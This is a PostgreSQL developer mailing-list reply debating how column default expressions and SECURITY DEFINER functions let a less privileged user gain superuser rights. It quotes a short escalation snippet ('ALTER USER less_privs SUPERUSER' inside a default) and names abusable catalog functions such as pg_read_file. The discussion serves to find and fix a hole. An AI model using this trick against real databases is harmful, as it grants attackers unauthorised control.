Hi, On 2023-01-12 23:38:50 -0800, Jeff Davis wrote: > On Thu, 2023-01-12 at 19:29 -0800, Andres Freund wrote: > > superuser: > > # CREATE FUNCTION exec_su(p_sql text) RETURNS text LANGUAGE plpgsql > > SECURITY DEFINER AS $$BEGIN RAISE NOTICE 'executing %', p_sql; > > EXECUTE p_sql;RETURN 'p_sql';END;$$; > > # REVOKE ALL ON FUNCTION exec_su FROM PUBLIC ; > > That can be solved by creating the function in a schema where ordinary > users don't have USAGE: > > CREATE TABLE trick_superuser(value text default admin.exec_su('ALTER > USER less_privs SUPERUSER')); > ERROR: permission denied for schema admin
Doubtful. Leaving aside the practicalities of using dedicated schemas and enforcing their use, there's plenty functions in pg_catalog that a less privileged user can use to do bad things. Just think of set_config(), pg_read_file(), lo_create(), binary_upgrade_*(), pg_drop_replication_slot()... If the default values get evaluated, this is arbitrary code exec, even if it requires a few contortions. And the same is true for evaluating *any* expression. > > And the admin likely can switch into the user context of > > the less privileged user to perform operations in a safer context. > > How would the admin do that? The malicious UDF can just "RESET SESSION > AUTHORIZATION" to pop back out of the safer context. I thought we had a reasonably convenient way, but now I am not sure anymore. Might have been via a C helper function. It can be hacked together, but this is an area that should be as unhacky as possible. > If there's not a good way to do this safely now, then we should > probably provide one. Yea, particularly because we do have all the infrastructure for it (c.f. SECURITY_LOCAL_USERID_CHANGE / SECURITY_RESTRICTED_OPERATION). Greetings, Andres Freund